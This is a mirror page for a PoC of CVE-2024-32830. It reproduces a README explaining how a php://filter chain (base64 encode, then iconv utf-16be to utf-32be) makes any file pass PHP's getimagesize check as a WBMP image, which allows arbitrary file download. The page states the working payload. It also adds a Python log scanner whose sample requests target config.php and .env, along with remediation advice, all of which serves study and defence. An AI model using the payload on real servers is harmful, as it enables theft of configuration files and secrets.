Related vulnerability
Description
PoC code to download files with CVE-2024-32830
Introduction
# CVE-2024-32830-poc
PoC code to download files with CVE-2024-32830
## `getimagesize` bypass
To bypass the `getimagesize` restriction, we can create a simple `image/vnd.wap.wbmp` image for PHP.
The check for the filetype is very simple:
```c
// https://github.com/php/php-src/blob/0029d2b08bbd3cb3aa293d9c8d55bf31faa9e203/ext/standard/image.c#L917
static int php_get_wbmp(php_stream *stream, struct gfxinfo **result, int check)
{
    int i, width = 0, height = 0;

    if (php_stream_rewind(stream)) {
        return 0;
    }

    /* get type */
    if (php_stream_getc(stream) != 0) {
        return 0;
    }

    /* skip header */
    do {
        i = php_stream_getc(stream);
        if (i < 0) {
            return 0;
        }
    } while (i & 0x80);

    /* get width */
    do {
        i = php_stream_getc(stream);
        if (i < 0) {
            return 0;
        }
        width = (width << 7) | (i & 0x7f);
        /* maximum valid width for wbmp (although 127 may be a more accurate one) */
        if (width > 2048) {
            return 0;
        }
    } while (i & 0x80);

    /* get height */
    do {
        i = php_stream_getc(stream);
        if (i < 0) {
            return 0;
        }
        height = (height << 7) | (i & 0x7f);
        /* maximum valid height for wbmp (although 127 may be a more accurate one) */
        if (height > 2048) {
            return 0;
        }
    } while (i & 0x80);

    if (!height || !width) {
        return 0;
    }

    if (!check) {
        (*result)->width = width;
        (*result)->height = height;
    }
    return IMAGE_FILETYPE_WBMP;
}
```
The simplest way to construct a valid image is two NUL bytes (type and header), followed by two bytes below `0x80`, one for the width and one for the height.
It's possible to do this for any file, using `php://filter`.
The first layer would need to apply a base64 encoding to ensure that all the data is ASCII, thus satisfying the `< 0x80` constraint.
The second filter would need to add the first two NUL bytes. This is possible by forcing a conversion from UTF-16BE to UTF-32BE. This will force iconv to interpret each chunk of two bytes as a valid UTF-16BE character, and then prepend two NUL bytes before it to make it UTF-32BE. The actual filter to use is: `convert.iconv.utf-16be.utf-32be`.
Our final payload is `php://filter/convert.base64-encode/convert.iconv.utf-16be.utf-32be/resource=<file here>`.
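From the defender's side, the tell-tale sign of this technique in request logs is a `php://filter/` wrapper with a `convert.iconv.utf-16be.utf-32be` stage in front of `resource=`. The following Python scanner is an added example, not part of the original PoC repository; it runs over constructed access-log lines, URL-decodes the request path repeatedly so double-encoded wrappers are not missed, and reports the filter chain and target resource of each hit.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (not from the original page). Line 2 carries the
# README's chain, line 4 a double-URL-encoded variant, lines 1 and 3 are benign.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /download.php?file=report.pdf HTTP/1.1" 200 5120
10.0.0.7 - - [01/Jan/2024:10:00:01 +0000] "GET /download.php?file=php://filter/convert.base64-encode/convert.iconv.utf-16be.utf-32be/resource=config.php HTTP/1.1" 200 3140
10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "POST /upload.php HTTP/1.1" 302 0
10.0.0.7 - - [01/Jan/2024:10:00:03 +0000] "GET /download.php?file=php%253A%252F%252Ffilter%252Fconvert.iconv.utf-16be.utf-32be%252Fresource%253D.env HTTP/1.1" 200 900
"""

REQUEST_RE = re.compile(r'"(?:GET|POST|PUT|HEAD)\s+(\S+)\s+HTTP/')
WRAPPER_RE = re.compile(r'php://filter/(?P<chain>.*?)/?resource=(?P<resource>[^&\s"]*)', re.IGNORECASE)

def decode_param(value: str, rounds: int = 3) -> str:
    """URL-decode repeatedly (bounded) so double-encoded wrappers are still seen."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def inspect_request(path: str):
    """Return chain details if the request path carries a php://filter wrapper, else None."""
    m = WRAPPER_RE.search(decode_param(path))
    if not m:
        return None
    filters = [f for f in m.group('chain').split('/') if f]
    return {
        'resource': m.group('resource'),
        'filters': filters,
        # The iconv stage is what prepends the two NUL bytes getimagesize expects.
        'wbmp_bypass': any(f.lower() == 'convert.iconv.utf-16be.utf-32be' for f in filters),
    }

def scan_log(text: str):
    """Scan access-log text; return one finding per request that uses a php://filter wrapper."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        req = REQUEST_RE.search(line)
        hit = inspect_request(req.group(1)) if req else None
        if hit:
            findings.append({'line': lineno, **hit})
    return findings

if __name__ == '__main__':
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

Beyond detection, the fix is to never pass user input to a stream-capable function: resolve the requested name against an allow-listed directory and reject anything containing a `://` scheme before `getimagesize` or `readfile` ever sees it.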
File snapshot
[4.0K] /data/pocs/3e06193edf45277bc164a9c7afd073c970c99e30
├── [1.0K] LICENSE
├── [1.1K] poc.py
└── [2.1K] README.md
0 directories, 3 files
Notes
1. It is recommended to access the PoC through its original source first.
2. If the source has been removed or cannot be reached, send an email to f.jinxu#gmail.com to request the local snapshot (replace # with @).
3. Shenlong (神龙) has taken a snapshot of the PoC code for you; to support long-term maintenance, please consider paying for the local PoC. Thank you for your support.